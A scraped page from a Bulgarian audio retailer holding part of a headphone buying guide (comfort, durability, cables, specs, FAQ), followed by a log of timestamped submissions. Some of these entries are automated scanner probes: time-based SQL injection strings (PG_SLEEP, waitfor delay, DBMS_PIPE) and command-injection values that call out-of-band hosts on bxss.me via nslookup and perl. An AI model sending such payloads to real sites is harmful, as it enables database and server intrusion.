/></li> <li><strong>Комфорт и тегло:</strong> Оценяването на качеството на звука винаги е субективно изживяване, но единственият начин да прецените комфорта е да ги включите и да слушате поне 10 минути.<br />Дали слушалките не оказват прекалено голям натиск върху ушите ви? Слушалките, които обграждат или покриват ушите ви, могат неприятно да запаравят, но ще трябва да ги поносите известно време, за да разберете. Някои от по-големите затворени модели с леки наушници от кожа са едни от главните виновници за това.<br /><br />Слушалките в стил "Pro" са сравнително обемни и могат да се окажат неприятно тежки след часове употреба. По-леките слушалки със стилна лентата за глава са почти винаги по-удобни. И дори да не са, поне са по-малка разправия при трнаспортиране.<br /><br /></li> <li><strong>Трайност:</strong> Няма причина слушалките да се третират като технология за еднократна употреба. За разлика от почти всичко останало в сферата на потребителската електроника, тазгодишните слушалки няма да са остарели шест месеца или една година от сега. Всъщност няма причина един добър чифт слушалки да не издържат почти десетилетие.<br /><br />Не забравяйте да оцените качеството на сглобките на бъдещите си слушалки. Например, някои наушници и преносими устройства са сравнително крехки. Ако слушалките се сгъват за по-лесно съхранение, пантите дали са здрави или ще се разпаднат след месец или два? Не забравяйте да вземете предвид, че наушниците, разбираемо, може значително да се износят през годините слушане.<br /><br /></li> <li><strong>Обвивка на кабела и дължина:</strong> Повечето стерео слушалки имат само един кабел, обикновено прикрепен към лявата слушалка (понякога наричана едностранно окабеляване). Някои модели - и всички в стил "тапи" - използват Y-кабел, който се свързва с двете слушалки (двустранно). Междувременно, накрайника на кабела обикновено е един от двата дизайна: прав I-накрайник или ъглов (извит) L-накрайник; последният може да бъде полезен, ако преносимият ви плейър има монтиран страничен или долен жак за слушалки.</li> </ul> <p><img src="https://cdncloudcart.com/14803/files/image/image.jpg" alt="" /></p> <p>Предпочитанията за дължината на кабела на слушалките варират, особено в зависимост от това къде предпочитате да носите аудио устройството си: за в раницата или джоба на панталоните е необходим по-дълъг кабел. По-къс кабел е необходим, ако носите плейъра си закачен на яката или закрепен с лента за ръката. Но дължината на кабела в която и да е крайност не трябва да е фатален недостатък: предлагат се удължения за кабели, които могат да добавят необходимата дължина към вашия кабел; както и допълнителни кабелни обвивки, които могат да скъсят тези, които са твърде дълги.</p> <p>&nbsp;</p> <p><strong><span style="text-decoration: underline; font-size: 12pt;">Кратък справочнк</span><br /></strong></p> <p>Ще намерите някои от следните спецификации върху кутията на слушалките или на уеб сайта на производителя. Ето какво означават те:</p> <p><strong><em>Честотна характеристика (Frequency response)</em></strong>: Спецификациите за честотна характеристика във големите високоговорителите като цяло са доста безполезни при прогнозиране на качеството на звука, но цифрите на честотната характеристика при слушалките е още по-зле. Производителите рутинно преувеличават тези цифри до такава степен, че те не са от значение. Дори и най-обикновените, евтини слушалки се гордеят с изключително ниска производителност - 15Hz или 20Hz, но почти винаги звучат повърхностно и не както очакваме.&nbsp;</p> <p><strong><em>Общо хармонично изкривяване:</em></strong> Вярно е, че слушалките с по-ниско общо хармонично изкривяване (От Латински: Total Harmonic Distortion, THD) ще звучат по-добре от тези с по-високо THD. Но цитираните THD числа - "по-малко от 1%" - не са полезни за прогнозиране на качеството на звука. Слушайте записи на просто записана акустична китара, за да прецените изкривяването на един чифт слушалки спрямо друг. Някои ще звучат значително по-чисто от други.</p> <p><strong><em>Импеданс:</em> </strong>Най-общо казано, колкото по-нисък е електрическият импеданс на слушалките (известен още като съпротивление), толкова по-лесно е да получите по-голям обем на звука. Но тук отново ниският импеданс не е гаранция за висока обемна способност; други фактори все още могат да ограничат потенциала на силата на звука. Тъй като много MP3 плейъри имат слаба мощност - iPod е забележително изключение - интелигентните купувачи трябва да проверят силата на звука, преди да закупят чифт слушалки. За да сте сигурни, тествайте намясто с плейъра си.</p> <p>&nbsp;</p> <p><strong><span style="text-decoration: underline; font-size: 12pt;">Често задавани въпроси</span></strong></p> <p><strong><span style="color: #993300;">Имам ли нужда от усилвател за слушалки?</span></strong></p> <p><span style="color: #000000;">Това, в което включвате слушалките, може значително да повлияе на звука им, а качеството на вградените усилватели в преносимите CD/MP3 плейъри, като цяло е ужасно. Това не е тяхна вина: тези компактни машинки трябва да захранват електрониката и вътрешния си усилвател, използвайки само няколко волта. Дори някои жакове за слушалки в по-добрите домашни AV приемници предлагат много променливо качество на звука.</span></p> <p><span style="color: #000000;"><img src="https://cdncloudcart.com/14803/files/image/-5e1750ac80e26.png" alt="" /><br /><span style="font-size: 8pt;">Снимка: Astell &amp; Kern/ Модел:<a href="https://kirov-high-end.bg/product/acro-l1000-desktop-ampdac">&nbsp;Astell &amp; Kern&nbsp;ACRO L1000</a></span><br /></span></p> <p>Ако през повечето време слушате от слушалки и се грижите за качеството на звука, бихте могли да помислите за закупуване на усилвател за слушалки. Предлагат се както домашни, така и преносими усилватели за слушалки.</p> <p><span style="color: #993300;"><strong>Загубих тапичките, с които дойдоха моите слушалки - трябва ли да си купя изцяло нов чифт слушалки?<br /></strong></span></p> <p>Абсолютно не ... освен ако не търсите извинение да опитате нещо ново. Но ако не сте направени от пари, винаги можете да се обърнете към производителя за нов чифт тапички за подмяна. Повечето наушници се предлагат само с един набор от всеки размер, така че загубата на една може да бъде неприятно. Ако сте в експериментално настроение, може дори да пробвате да ги смените с такива от различен материал.</p> <p><strong><span style="color: #993300;">Значи ли по-високата цена, че слушалките ще звучат по-добре?</span></strong></p> <p><span style="color: #000000;">Не е задължително. Непрекъснато се изненадваме, че хората раздават стотици левове за смартфон и все още отказват да инвестират в качествени слушалки, за да ги използват с него. От друга страна, не всички бюджетни слушалки трябва да се приемат за евтини.</span><strong><span style="color: #993300;"><br /></span></strong></p> <p>&nbsp;</p> <p><span style="font-size: 12pt;"><strong><span style="color: #000000;">Готови ли сте за пазаруване? Преминете към нашия електронен магазин за аудио техника, за да започнете.</span></strong></span></p> <p><span style="font-size: 12pt;"><a href="https://kirov-high-end.bg/"><strong><span style="color: #000000;"><img src="https://cdncloudcart.com/14803/files/image/screenshot_3-5e1757561fe2a.png" alt="" /></span></strong></a></span></p> <p><span style="font-size: 12pt;"><strong><span style="color: #000000;">Или заповядайте на нашия щанд, за да приложите каквото научихте и да тествате на място!</span></strong></span></p> <p>&nbsp;<iframe style="border: none; overflow: hidden;" src="https://www.facebook.com/plugins/share_button.php?href=https%3A%2F%2Fkirov-high-end.bg%2Farticle%2Fkak-da-si-izberem-slushalki&amp;layout=button&amp;size=small&amp;width=67&amp;height=20&amp;appId" width="67" height="20" frameborder="0" scrolling="no"></iframe></p> <p>&nbsp;</p> <p>&nbsp;</p> <p>&nbsp;</p>

2021-01-22T00:47:15+02:00
555

2021-01-22T00:46:29+02:00
555

2021-01-22T00:46:18+02:00
555

2021-01-22T00:45:41+02:00
555

2021-01-22T00:45:30+02:00
555

2021-01-22T00:45:18+02:00
555

2021-01-22T00:45:08+02:00
555

2021-01-22T00:44:37+02:00
555

2021-01-22T00:44:27+02:00
555

2021-01-22T00:44:18+02:00
555

2021-01-22T00:44:08+02:00
555

2021-01-22T00:43:59+02:00
555

2021-01-22T00:43:35+02:00
555

2021-01-22T00:43:25+02:00
555

2021-01-22T00:43:16+02:00
555

2021-01-22T00:43:05+02:00
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

2021-01-22T00:42:55+02:00
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

2021-01-22T00:42:30+02:00
I9tK5mHV') OR 735=(SELECT 735 FROM PG_SLEEP(15))--

2021-01-22T00:42:20+02:00
b4XnnBRy' OR 564=(SELECT 564 FROM PG_SLEEP(15))--

2021-01-22T00:42:11+02:00
-1)) OR 295=(SELECT 295 FROM PG_SLEEP(15))--

2021-01-22T00:42:01+02:00
-5) OR 512=(SELECT 512 FROM PG_SLEEP(15))--

2021-01-22T00:41:49+02:00
-5 OR 581=(SELECT 581 FROM PG_SLEEP(15))--

2021-01-22T00:41:28+02:00
1 waitfor delay '0:0:15' --

2021-01-22T00:41:17+02:00
-1); waitfor delay '0:0:15' --

2021-01-22T00:41:06+02:00
-1; waitfor delay '0:0:15' --

2021-01-22T00:40:56+02:00
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

2021-01-22T00:40:46+02:00
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

2021-01-22T00:39:41+02:00
555

2021-01-22T00:39:41+02:00
B9T4kpcD

2021-01-22T00:39:41+02:00
&(nslookup hiteyzlhvcejw7e1ab.bxss.me||perl -e "gethostbyname('hiteyzlhvcejw7e1ab.bxss.me')")&'\"`0&(nslookup hiteyzlhvcejw7e1ab.bxss.me||perl -e "gethostbyname('hiteyzlhvcejw7e1ab.bxss.me')")&`'

2021-01-22T00:39:40+02:00
555

2021-01-22T00:39:40+02:00
$(nslookup hitlhgywfuxybd83c6.bxss.me||perl -e "gethostbyname('hitlhgywfuxybd83c6.bxss.me')")
Сравнение на продукти